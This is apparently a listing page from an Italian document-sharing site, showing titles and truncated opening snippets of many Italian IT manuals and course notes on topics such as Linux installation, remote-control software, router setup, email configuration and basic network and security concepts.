Virtualizzazione e installazione Linux Virtualizzazione e installazione Linux Federico De Meo, Davide Quaglia, Simone Bronuzzi Lo scopo di questa esercitazione è quello di introdurre il concetto di virtualizzazione, di creare un ambiente virtuale

Dettagli

Configurazioni Mobile Connect

Configurazioni Mobile Connect Mailconnect Mail.2 L EVOLUZIONE DELLA POSTA ELETTRONICA Configurazioni Mobile Connect iphone MOBILE CONNECT CONFIGURAZIONE MOBILE CONNECT PER IPHONE CONFIGURAZIONE IMAP PER IPHONE RUBRICA CONTATTI E IPHONE

Dettagli

Introduzione a Puppy Linux: installazione su una chiavetta USB

Introduzione a Puppy Linux: installazione su una chiavetta USB Introduzione a Puppy Linux: installazione su una chiavetta USB Alex Gotev 1 Contenuti Che cos'è Puppy Linux? Come posso averlo? Come si avvia? Che programmi include? Installazione su Chiavetta USB Domande

Dettagli

FileMaker Server 12. Guida introduttiva

FileMaker Server 12. Guida introduttiva FileMaker Server 12 Guida introduttiva 2007 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi di FileMaker,

Dettagli

ALFABETIZZAZIONE DI BASE Programma del Corso livello base

ALFABETIZZAZIONE DI BASE Programma del Corso livello base Un po di Storia ISP & Web Engineering ALFABETIZZAZIONE DI BASE Programma del Corso livello base Breve cenno sulla storia dell informatica: dagli albori ai giorni nostri; L evoluzione di Windows: dalla

Dettagli

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO CLSMS SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO Sommario e introduzione CLSMS SOMMARIO INSTALLAZIONE E CONFIGURAZIONE... 3 Parametri di configurazione... 4 Attivazione Software...

Dettagli

Lezione n 1! Introduzione"

Lezione n 1! Introduzione Lezione n 1! Introduzione" Corso sui linguaggi del web" Fondamentali del web" Fondamentali di una gestione FTP" Nomenclatura di base del linguaggio del web" Come funziona la rete internet?" Connessione"

Dettagli

UBUNTU SERVER. Installazione e configurazione di Ubuntu Server. M. Cesa 1

UBUNTU SERVER. Installazione e configurazione di Ubuntu Server. M. Cesa 1 UBUNTU SERVER Installazione e configurazione di Ubuntu Server M. Cesa 1 Ubuntu Server Scaricare la versione deisiderata dalla pagina ufficiale http://www.ubuntu.com/getubuntu/download-server Selezioniare

Dettagli

Conferencing Services. Web Meeting. Quick Start Guide V4_IT

Conferencing Services. Web Meeting. Quick Start Guide V4_IT Web Meeting Quick Start Guide V4_IT Indice 1 INFORMAZIONI SUL PRODOTTO... 3 1.1 CONSIDERAZIONI GENERALI... 3 1.2 SISTEMI OPERATIVI SUPPORTATI E LINGUE... 3 1.3 CARATTERISTICHE... 3 2 PRENOTARE UNA CONFERENZA...

Dettagli

APRS su Linux con Xastir, installazione dai sorgenti

APRS su Linux con Xastir, installazione dai sorgenti APRS su Linux con Xastir Installazione dai sorgenti L installazione di Xastir Per installare Xastir non è richiesto essere un guru di Linux, anche se una conoscenza minima della piattaforma è necessaria.

Dettagli

Creare e ripristinare immagine di sistema con Windows 8

Creare e ripristinare immagine di sistema con Windows 8 Creare e ripristinare immagine di con Windows 8 La versione Pro di Windows 8 offre un interessante strumento per il backup del computer: la possibilità di creare un immagine completa del, ovvero la copia

Dettagli

Funzioni di base. Manualino OE6. Outlook Express 6

Funzioni di base. Manualino OE6. Outlook Express 6 Manualino OE6 Microsoft Outlook Express 6 Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito,

Dettagli

C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D

C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D Se avete un tablet android, ma non avete la minima idea di come accenderlo, usarlo e avviarlo, seguite queste nostre indicazioni 1. ATTIVAZIONE

Dettagli

ATLAS 2.X IL MANAGER NON SI AVVIA

ATLAS 2.X IL MANAGER NON SI AVVIA ATLAS 2.X IL MANAGER NON SI AVVIA Avvio di Atlas 2.x sul server CONTESTO La macchina deve rispecchiare le seguenti caratteristiche MINIME di sistema: Valori MINIMI per Server di TC con 10 postazioni d'esame

Dettagli

Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@

Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@ Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@ Installazione Modem USB Momo Gestione segnale di rete Connessione Internet Messaggi di errore "Impossibile visualizzare la pagina" o "Pagina

Dettagli

MailStore Proxy è disponibile gratuitamente per tutti i clienti di MailStore Server all indirizzo http://www.mailstore.com/en/downloads.

MailStore Proxy è disponibile gratuitamente per tutti i clienti di MailStore Server all indirizzo http://www.mailstore.com/en/downloads. MailStore Proxy Con MailStore Proxy, il server proxy di MailStore, è possibile archiviare i messaggi in modo automatico al momento dell invio/ricezione. I pro e i contro di questa procedura vengono esaminati

Dettagli

TeamViewer 7 Manuale Controllo remoto

TeamViewer 7 Manuale Controllo remoto TeamViewer 7 Manuale Controllo remoto TeamViewer GmbH Kuhnbergstraße 16 D-73037 Göppingen teamviewer.com Indice 1 Informazioni su TeamViewer... 5 1.1 Informazioni sul software... 5 1.2 Informazioni sul

Dettagli

Assistenza. Contenuto della confezione. Modem router Wi-Fi D6200B Guida all'installazione

Assistenza. Contenuto della confezione. Modem router Wi-Fi D6200B Guida all'installazione Assistenza Grazie per aver scelto i prodotti NETGEAR. Una volta completata l'installazione del dispositivo, individuare il numero di serie riportato sull'etichetta del prodotto e utilizzarlo per registrare

Dettagli

Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili

Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili 2012 NETGEAR, Inc. Tutti i diritti riservati. Nessuna parte della presente pubblicazione può essere riprodotta, trasmessa, trascritta,

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione Le Reti di Calcolatori (parte 2) Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Docente: Daniela

Dettagli

INDICE Informazioni Generali... 4. Comprare ebook con Kobo Desktop... 8. Usare la Libreria di Kobo Desktop... 10. Leggere su Kobo Desktop...

INDICE Informazioni Generali... 4. Comprare ebook con Kobo Desktop... 8. Usare la Libreria di Kobo Desktop... 10. Leggere su Kobo Desktop... Kobo Desktop Manuale Utente INDICE Informazioni Generali... 4 Installare Kobo Desktop su Windows... 5 Installare Kobo Desktop su Mac... 6 Comprare ebook con Kobo Desktop... 8 Usare la Libreria di Kobo

Dettagli

Guida all'installazione del WiFi Booster WN1000RP per dispositivi mobili

Guida all'installazione del WiFi Booster WN1000RP per dispositivi mobili Guida all'installazione del WiFi Booster WN1000RP per dispositivi mobili Sommario Per iniziare............................................ 3 Il WiFi Booster......................................... 4 Pannello

Dettagli

Mod. 4: L architettura TCP/ IP Classe 5 I ITIS G. Ferraris a.s. 2011 / 2012 Marcianise (CE) Prof. M. Simone

Mod. 4: L architettura TCP/ IP Classe 5 I ITIS G. Ferraris a.s. 2011 / 2012 Marcianise (CE) Prof. M. Simone Paragrafo 1 Prerequisiti Definizione di applicazione server Essa è un servizio che è in esecuzione su un server 1 al fine di essere disponibile per tutti gli host che lo richiedono. Esempi sono: il servizio

Dettagli

Configuration Managment Configurare EC2 su AWS. Tutorial. Configuration Managment. Configurare il servizio EC2 su AWS. Pagina 1

Configuration Managment Configurare EC2 su AWS. Tutorial. Configuration Managment. Configurare il servizio EC2 su AWS. Pagina 1 Tutorial Configuration Managment Configurare il servizio EC2 su AWS Pagina 1 Sommario 1. INTRODUZIONE... 3 2. PROGRAMMI NECESSARI... 4 3. PANNELLO DI CONTROLLO... 5 4. CONFIGURARE E LANCIARE UN ISTANZA...

Dettagli

Istruzioni per l uso Guida software

Istruzioni per l uso Guida software Istruzioni per l uso Guida software Leggere subito Manuali per questa stampante...8 Preparazione per la stampa Installazione rapida...9 Conferma del metodo di connessione...11 Connessione di rete...11

Dettagli

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus EUROPEAN COMPUTER DRIVING LICENCE IT Security Syllabus Scopo Questo documento presenta il syllabus di ECDL Standard IT Security. Il syllabus descrive, attraverso i risultati del processo di apprendimento,

Dettagli

Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore)

Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore) Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore) Autore: Matteo Veroni Email: matver87@gmail.com Sito web: matteoveroni@altervista.org Fonti consultate: http://openmeetings.apache.org/

Dettagli

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it Sicurezza delle reti wireless Alberto Gianoli alberto.gianoli@fe.infn.it Concetti di base IEEE 802.11: famiglia di standard tra cui: 802.11a, b, g: physical e max data rate spec. 802.11e: QoS (traffic

Dettagli

Guida alla scansione su FTP

Guida alla scansione su FTP Guida alla scansione su FTP Per ottenere informazioni di base sulla rete e sulle funzionalità di rete avanzate della macchina Brother, consultare la uu Guida dell'utente in rete. Per ottenere informazioni

Dettagli

Guida al nuovo sistema di posta. CloudMail UCSC. (rev.doc. 1.4)

Guida al nuovo sistema di posta. CloudMail UCSC. (rev.doc. 1.4) Guida al nuovo sistema di posta CloudMail UCSC (rev.doc. 1.4) L Università per poter migliorare l utilizzo del sistema di posta adeguandolo agli standard funzionali più diffusi ha previsto la migrazione

Dettagli

Esiste la versione per Linux di GeCo? Allo stato attuale non è prevista la distribuzione di una versione di GeCo per Linux.

Esiste la versione per Linux di GeCo? Allo stato attuale non è prevista la distribuzione di una versione di GeCo per Linux. FAQ su GeCo Qual è la differenza tra la versione di GeCo con installer e quella portabile?... 2 Esiste la versione per Linux di GeCo?... 2 Quali sono le credenziali di accesso a GeCo?... 2 Ho smarrito

Dettagli

Mail da Web. Caratteristiche generali di Virgilio Mail. Funzionalità di Virgilio Mail. Leggere la posta. Come scrivere un email.

Mail da Web. Caratteristiche generali di Virgilio Mail. Funzionalità di Virgilio Mail. Leggere la posta. Come scrivere un email. Mail da Web Caratteristiche generali di Virgilio Mail Funzionalità di Virgilio Mail Leggere la posta Come scrivere un email Giga Allegati Contatti Opzioni Caratteristiche generali di Virgilio Mail Virgilio

Dettagli

SERVER VIDEO 1-PORTA H.264

SERVER VIDEO 1-PORTA H.264 SERVER VIDEO 1-PORTA H.264 MANUALE UTENTE DN-16100 SALVAGUARDIA IMPORTANTE Tutti i prodotti senza piombo offerti dall'azienda sono a norma con i requisiti della legge Europea sulla restrizione per l'uso

Dettagli

NAS 208 WebDAV Un'alternativa sicura per la condivisione di file su FTP

NAS 208 WebDAV Un'alternativa sicura per la condivisione di file su FTP NAS 208 WebDAV Un'alternativa sicura per la condivisione di file su FTP Eseguire il collegamento al NAS tramite WebDAV A S U S T O R C O L L E G E OBIETTIVI DEL CORSO Al termine di questo corso si dovrebbe

Dettagli

CARATTERISTICHE DELLE CRYPTO BOX

CARATTERISTICHE DELLE CRYPTO BOX Secure Stream PANORAMICA Il sistema Secure Stream è costituito da due appliance (Crypto BOX) in grado di stabilire tra loro un collegamento sicuro. Le Crypto BOX sono dei veri e propri router in grado

Dettagli

Guida all'installazione ed uso dell'app RXCamLink

Guida all'installazione ed uso dell'app RXCamLink Guida all'installazione ed uso dell'app RXCamLink Questa guida riporta i passi relativi all'installazione ed all'utilizzo dell'app "RxCamLink" per il collegamento remoto in mobilità a sistemi TVCC basati

Dettagli

PROCEDURA DI INSTALLAZIONE DI MYSQL E VolT per utenti Visual Trader e InteractiveBrokers

PROCEDURA DI INSTALLAZIONE DI MYSQL E VolT per utenti Visual Trader e InteractiveBrokers PROCEDURA DI INSTALLAZIONE DI MYSQL E VolT per utenti Visual Trader e InteractiveBrokers La procedura di installazione è divisa in tre parti : Installazione dell archivio MySql, sul quale vengono salvati

Dettagli

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito, semplice da utilizzare e fornisce

Dettagli

Procedura per il ripristino dei certificati del dispositivo USB

Procedura per il ripristino dei certificati del dispositivo USB Procedura per il ripristino dei certificati del dispositivo USB 30/04/2013 Sommario - Limitazioni di responsabilità e uso del manuale... 3 1 Glossario... 3 2 Presentazione... 4 3 Quando procedere al ripristino

Dettagli

GESTIRE LA BIBLIOGRAFIA

GESTIRE LA BIBLIOGRAFIA GESTIRE LA BIBLIOGRAFIA STRUMENTI DI GESTIONE BIBLIOGRAFICA I software di gestione bibliografica permettono di raccogliere, catalogare e organizzare diverse tipologie di materiali, prendere appunti, formattare

Dettagli

TeamViewer 8 Manuale Controllo remoto

TeamViewer 8 Manuale Controllo remoto TeamViewer 8 Manuale Controllo remoto Rev 8.0-12/2012 TeamViewer GmbH Kuhnbergstraße 16 D-73037 Göppingen www.teamviewer.com Indice 1 Informazioni su TeamViewer... 6 1.1 Informazioni sul software... 6

Dettagli

Installazione LINUX 10.0

Installazione LINUX 10.0 Installazione LINUX 10.0 1 Principali passi Prima di iniziare con l'installazione è necessario entrare nel menu di configurazione del PC (F2 durante lo start-up) e selezionare nel menu di set-up il boot

Dettagli

GUIDA RAPIDA ALL INSTALLAZIONE

GUIDA RAPIDA ALL INSTALLAZIONE GUIDA RAPIDA ALL INSTALLAZIONE Sommario DECODER CUBOVISION 1 TELECOMANDO 3 COLLEGAMENTO ALLA TV 4 COLLEGAMENTO A INTERNET 6 COLLEGAMENTO ANTENNA 8 COLLEGAMENTO ALLA RETE ELETTRICA 9 COLLEGAMENTO AUDIO

Dettagli

Seagate Access per Personal Cloud Manuale utente

Seagate Access per Personal Cloud Manuale utente Seagate Access per Personal Cloud Manuale utente 2015 Seagate Technology LLC. Tutti i diritti riservati. Seagate, Seagate Technology, il logo Wave e FreeAgent sono marchi depositati o marchi registrati

Dettagli

Guida ai Servizi Voce per il Referente. Guida ai Servizi Voce per il Referente

Guida ai Servizi Voce per il Referente. Guida ai Servizi Voce per il Referente Guida ai Servizi Voce per il Referente Guida ai Servizi Voce per il Referente 1 Sommario 1 Introduzione... 3 1.1 Accesso al Self Care Web di Rete Unica... 4 2 Servizi Aziendali... 6 2.1 Centralino - Numero

Dettagli

Installazione ed attivazione della "SUITE OFFIS" versione SERVER

Installazione ed attivazione della SUITE OFFIS versione SERVER Installazione ed attivazione della "SUITE OFFIS" versione SERVER Premessa La versione server di OFFIS può essere installata e utilizzata indifferentemente da PC/Win o Mac/Osx e consente l'accesso contemporaneo

Dettagli

iphone in azienda Guida alla configurazione per gli utenti

iphone in azienda Guida alla configurazione per gli utenti iphone in azienda Guida alla configurazione per gli utenti iphone è pronto per le aziende. Supporta Microsoft Exchange ActiveSync, così come servizi basati su standard, invio e ricezione di e-mail, calendari

Dettagli

Manuale di installazione e d uso

Manuale di installazione e d uso Manuale di installazione e d uso 1 Indice Installazione del POS pag. 2 Funzionalità di Base - POS Sagem - Accesso Operatore pag. 2 - Leggere una Card/braccialetto Cliente con il lettore di prossimità TeliumPass

Dettagli

Manuale di Remote Desktop Connection. Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci

Manuale di Remote Desktop Connection. Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci Manuale di Remote Desktop Connection Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci 2 Indice 1 Introduzione 5 2 Il protocollo Remote Frame Buffer 6 3 Uso di Remote Desktop

Dettagli

Come difendersi dai VIRUS

Come difendersi dai VIRUS Come difendersi dai VIRUS DEFINIZIONE Un virus è un programma, cioè una serie di istruzioni, scritte in un linguaggio di programmazione, in passato era di solito di basso livello*, mentre con l'avvento

Dettagli

Boot Camp Guida all installazione e alla configurazione

Boot Camp Guida all installazione e alla configurazione Boot Camp Guida all installazione e alla configurazione Indice 4 Introduzione 5 Cosa ti occorre 6 Panoramica dell installazione 6 Passo 1: verifica la presenza di aggiornamenti. 6 Passo 2: apri Assistente

Dettagli

Modulo. Programmiamo in Pascal. Unità didattiche COSA IMPAREREMO...

Modulo. Programmiamo in Pascal. Unità didattiche COSA IMPAREREMO... Modulo A Programmiamo in Pascal Unità didattiche 1. Installiamo il Dev-Pascal 2. Il programma e le variabili 3. Input dei dati 4. Utilizziamo gli operatori matematici e commentiamo il codice COSA IMPAREREMO...

Dettagli

Manuale di configurazione per l accesso alla rete wireless Eduroam per gli utenti dell Università degli Studi di Cagliari

Manuale di configurazione per l accesso alla rete wireless Eduroam per gli utenti dell Università degli Studi di Cagliari Manuale di configurazione per l accesso alla rete wireless Eduroam per gli utenti dell Università degli Studi di Cagliari Rev 1.0 Indice: 1. Il progetto Eduroam 2. Parametri Generali 3. Protocolli supportati

Dettagli

SISSI IN RETE. Quick Reference guide guida di riferimento rapido

SISSI IN RETE. Quick Reference guide guida di riferimento rapido SISSI IN RETE Quick Reference guide guida di riferimento rapido Indice generale Sissi in rete...3 Introduzione...3 Architettura Software...3 Installazione di SISSI in rete...3 Utilizzo di SISSI in Rete...4

Dettagli

Istruzioni per l importazione del certificato per Internet Explorer

Istruzioni per l importazione del certificato per Internet Explorer Istruzioni per l importazione del certificato per Internet Explorer 1. Prima emissione certificato 1 2. Rilascio nuovo certificato 10 3. Rimozione certificato 13 1. Prima emissione certificato Dal sito

Dettagli

Privacy Policy del sito http://www.plastic-glass.com

Privacy Policy del sito http://www.plastic-glass.com Cos'è una PRIVACY POLICY Privacy Policy del sito http://www.plastic-glass.com Questo documento, concernente le politiche di riservatezza dei dati personali di chi gestisce il sito Internet http://www.plastic-glass.com

Dettagli

Guida pratica di base

Guida pratica di base Adolfo Catelli Guida pratica di base Windows XP Professional Dicembre 2008 Sommario Accedere a Windows XP 4 Avviare Windows XP 4 Uscire da Windows XP 5 L interfaccia utente di Windows XP 6 Il desktop di

Dettagli

ASTA IN GRIGLIA PRO. COSA PERMETTE DI FARE (per ora) Asta In Griglia PRO:

ASTA IN GRIGLIA PRO. COSA PERMETTE DI FARE (per ora) Asta In Griglia PRO: ASTA IN GRIGLIA PRO Asta in Griglia PRO è un software creato per aiutare il venditore Ebay nella fase di post-vendita, da quando l inserzione finisce con una vendita fino alla spedizione. Il programma

Dettagli

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

Guida all Uso. L a t u a i m p r e s a, c h i av e i n m a n o. Guida_BusinessKey.indd 1 18-05-2007 10:53:34

Guida all Uso. L a t u a i m p r e s a, c h i av e i n m a n o. Guida_BusinessKey.indd 1 18-05-2007 10:53:34 Guida all Uso L a t u a i m p r e s a, c h i av e i n m a n o. Guida_BusinessKey.indd 1 18-05-2007 10:53:34 Cos è la Business Key La Business Key è una chiavetta USB portatile, facile da usare, inseribile

Dettagli

GUIDA ALLA CONFIGURAZIONE DELLA POSTA iphone/ipad. (v. 1.0.0 Maggio 2014)

GUIDA ALLA CONFIGURAZIONE DELLA POSTA iphone/ipad. (v. 1.0.0 Maggio 2014) GUIDA ALLA CONFIGURAZIONE DELLA POSTA iphone/ipad (v. 1.0.0 Maggio 2014) Benvenuto alla guida di configurazione della posta elettronica per dispositivi mobili tipo iphone/ipad. Prima di proseguire, assicurati

Dettagli

Manuale d uso. Congratulazioni per aver scelto e-tab. Ti ringraziamo per la Tua fiducia e la decisione di comprare il nostro prodotto!

Manuale d uso. Congratulazioni per aver scelto e-tab. Ti ringraziamo per la Tua fiducia e la decisione di comprare il nostro prodotto! Manuale d uso Congratulazioni per aver scelto e-tab. Ti ringraziamo per la Tua fiducia e la decisione di comprare il nostro prodotto! Giacchè noi costantemente aggiorniamo e miglioriamo il Tuo e-tab, potrebbero

Dettagli

Access Point WiFi Powerline 500 XWNB5201 - Guida all installazione

Access Point WiFi Powerline 500 XWNB5201 - Guida all installazione Access Point WiFi Powerline 500 XWNB5201 - Guida all installazione Assistenza tecnica Grazie per aver scelto i prodotti NETGEAR. Una volta completata l'installazione del dispositivo, individuare il numero

Dettagli

HORIZON SQL CONFIGURAZIONE DI RETE

HORIZON SQL CONFIGURAZIONE DI RETE 1-1/9 HORIZON SQL CONFIGURAZIONE DI RETE 1 CARATTERISTICHE DI UN DATABASE SQL...1-2 Considerazioni generali... 1-2 Concetto di Server... 1-2 Concetto di Client... 1-2 Concetto di database SQL... 1-2 Vantaggi...

Dettagli

Suggerimenti forniti da MetaQuotes per l utilizzo di MetaTrader 4 con Mac OS

Suggerimenti forniti da MetaQuotes per l utilizzo di MetaTrader 4 con Mac OS Suggerimenti forniti da MetaQuotes per l utilizzo di MetaTrader 4 con Mac OS Nonostante esistano già in rete diversi metodi di vendita, MetaQuotes il programmatore di MetaTrader 4, ha deciso di affidare

Dettagli

Per Iniziare con Parallels Desktop 10

Per Iniziare con Parallels Desktop 10 Per Iniziare con Parallels Desktop 10 Copyright 1999-2014 Parallels IP Holdings GmbH e i suoi affiliati. Tutti i diritti riservati. Parallels IP Holdings GmbH Vordergasse 59 8200 Schaffhausen Svizzera

Dettagli

Come configurare un programma di posta con l account PEC di GLOBALCERT.IT

Come configurare un programma di posta con l account PEC di GLOBALCERT.IT Come configurare un programma di posta con l account PEC di GLOBALCERT.IT Il Titolare di una nuova casella PEC può accedere al sistema sia tramite Web (Webmail i ), sia configurando il proprio account

Dettagli

In questo manuale, si fa riferimento a ipod touch 5a generazione e iphone 5 con il solo termine iphone con connettore Lightning.

In questo manuale, si fa riferimento a ipod touch 5a generazione e iphone 5 con il solo termine iphone con connettore Lightning. In questo manuale, si fa riferimento a ipod touch 5a generazione e iphone 5 con il solo termine iphone con connettore Lightning. Per collegare un iphone con connettore Lightning ad SPH-DA100 AppRadio e

Dettagli

GUIDA RAPIDA emagister-agora Edizione BASIC

GUIDA RAPIDA emagister-agora Edizione BASIC GUIDA RAPIDA emagister-agora Edizione BASIC Introduzione a emagister-agora Interfaccia di emagister-agora Configurazione dell offerta didattica Richieste d informazioni Gestione delle richieste d informazioni

Dettagli

WAN 80.80.80.80 / 24. L obiettivo è quello di mappare due server web interni (porta 80) associandoli agli indirizzi IP Pubblici forniti dall ISP.

WAN 80.80.80.80 / 24. L obiettivo è quello di mappare due server web interni (porta 80) associandoli agli indirizzi IP Pubblici forniti dall ISP. Configurazione di indirizzi IP statici multipli Per mappare gli indirizzi IP pubblici, associandoli a Server interni, è possibile sfruttare due differenti metodi: 1. uso della funzione di Address Translation

Dettagli

Creare una pen drive bottabile con Zeroshell oppure installarlo su hard disk. by Gassi Vito info@gassielettronica.com

Creare una pen drive bottabile con Zeroshell oppure installarlo su hard disk. by Gassi Vito info@gassielettronica.com Creare una pen drive bottabile con Zeroshell oppure installarlo su hard disk by Gassi Vito info@gassielettronica.com Questa breve guida pratica ci consentirà installare Zeroshell su pen drive o schede

Dettagli

Windows Mail Outlook Express 6 Microsoft Outlook 2003 Microsoft Outlook 2007 Thunderbird Opera Mail Mac Mail

Windows Mail Outlook Express 6 Microsoft Outlook 2003 Microsoft Outlook 2007 Thunderbird Opera Mail Mac Mail Configurare un programma di posta con l account PEC di Il Titolare di una nuova casella PEC può accedere al sistema sia tramite Web (Webmail i ), sia configurando il proprio account ii nel programma di

Dettagli

Informatica per la comunicazione" - lezione 9 -

Informatica per la comunicazione - lezione 9 - Informatica per la comunicazione" - lezione 9 - Protocolli di livello intermedio:" TCP/IP" IP: Internet Protocol" E il protocollo che viene seguito per trasmettere un pacchetto da un host a un altro, in

Dettagli

GUIDA alla configurazione di un DVR o Router su dyndns.it. in modalità compatibile www.dyndns.org

GUIDA alla configurazione di un DVR o Router su dyndns.it. in modalità compatibile www.dyndns.org GUIDA alla configurazione di un DVR o Router su dyndns.it in modalità compatibile www.dyndns.org Questa semplice guida fornisce le informazioni necessarie per eseguire la registrazione del proprio DVR

Dettagli

GESTIONE DELLA E-MAIL

GESTIONE DELLA E-MAIL GESTIONE DELLA E-MAIL Esistono due metodologie, completamente diverse tra loro, in grado di consentire la gestione di più caselle di Posta Elettronica: 1. tramite un'interfaccia Web Mail; 2. tramite alcuni

Dettagli

MANUALE DOS INTRODUZIONE

MANUALE DOS INTRODUZIONE MANUALE DOS INTRODUZIONE Il DOS è il vecchio sistema operativo, che fino a qualche anno fa era il più diffuso sui PC, prima dell avvento di Windows 95 e successori. Le caratteristiche principali di questo

Dettagli

CHE COS È DOCFLY FATTURAZIONE PA... 3 1.1 IL GESTIONALE WEB... 3 1.2 ACCESSO ALL INTERFACCIA WEB... 4 1.3 FUNZIONALITÀ DELL INTERFACCIA WEB...

CHE COS È DOCFLY FATTURAZIONE PA... 3 1.1 IL GESTIONALE WEB... 3 1.2 ACCESSO ALL INTERFACCIA WEB... 4 1.3 FUNZIONALITÀ DELL INTERFACCIA WEB... 1. CHE COS È DOCFLY FATTURAZIONE PA... 3 1.1 IL GESTIONALE WEB... 3 1.2 ACCESSO ALL INTERFACCIA WEB... 4 1.3 FUNZIONALITÀ DELL INTERFACCIA WEB... 5 1.3.1 CREAZIONE GUIDATA DELLA FATTURA IN FORMATO XML

Dettagli

MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO

MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO Precisione del riconoscimento Velocità di riconoscimento Configurazione del sistema Correzione Regolazione della

Dettagli

Capitolo 2 Acquisizione di contenuti per Kindle...16. Fai acquisti nel Kindle Store, quando vuoi e dove vuoi...16

Capitolo 2 Acquisizione di contenuti per Kindle...16. Fai acquisti nel Kindle Store, quando vuoi e dove vuoi...16 Guida all uso di Kindle 2 Indice Indice Consigli e suggerimenti...5 Capitolo 1 Primi passi...9 Registrazione di Kindle Touch...9 Comandi di Kindle Touch...9 Azioni su schermo... 10 Tastiera su schermo...

Dettagli

INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:...

INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:... INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:...14 Ultimo Aggiornamento del Documento: 23 / Marzo / 2012 1 INFORMAZIONI

Dettagli

SOGEAS - Manuale operatore

SOGEAS - Manuale operatore SOGEAS - Manuale operatore Accesso La home page del programma si trova all indirizzo: http://www.sogeas.net Per accedere, l operatore dovrà cliccare sulla voce Accedi in alto a destra ed apparirà la seguente

Dettagli

Guida Samsung Galaxy S Advance

Guida Samsung Galaxy S Advance Guida Samsung Galaxy S Advance Il manuale utente completo del telefono si può scaricare da qui: http://bit.ly/guidasamsung NB: la guida è riferita solo al Samsung Galaxy S Advance, con sistema operativo

Dettagli

Sistema di telecomunicazione per le piccole e medie imprese.

Sistema di telecomunicazione per le piccole e medie imprese. Sistema di telecomunicazione per le piccole e medie imprese. Sistema di telecomunicazione Promelit ipecs MG. Descrizione del Sistema: L azienda di oggi deve saper anche essere estesa : non confinata in

Dettagli

Boot Camp Guida di installazione e configurazione

Boot Camp Guida di installazione e configurazione Boot Camp Guida di installazione e configurazione Indice 3 Introduzione 4 Panoramica dell'installazione 4 Passo 1: Verificare la presenza di aggiornamenti 4 Passo 2: Per preparare il Mac per Windows 4

Dettagli

IDom. Omnicon SRL Via Petrarca 14 20843 Verano Brianza (MB) info@omnicon.it

IDom. Omnicon SRL Via Petrarca 14 20843 Verano Brianza (MB) info@omnicon.it IDom MANUALE UTENTE Omnicon SRL Via Petrarca 14 20843 Verano Brianza (MB) info@omnicon.it 2 COPYRIGHT Tutti i nomi ed i marchi citati nel documento appartengono ai rispettivi proprietari. Le informazioni

Dettagli

Cos è un protocollo? Ciao. Ciao 2:00. tempo. Un protocollo umano e un protocollo di reti di computer:

Cos è un protocollo? Ciao. Ciao 2:00. <file> tempo. Un protocollo umano e un protocollo di reti di computer: Cos è un protocollo? Un protocollo umano e un protocollo di reti di computer: Ciao Ciao Hai l ora? 2:00 tempo TCP connection request TCP connection reply. Get http://www.di.unito.it/index.htm Domanda:

Dettagli

Funzioni nuove e modificate

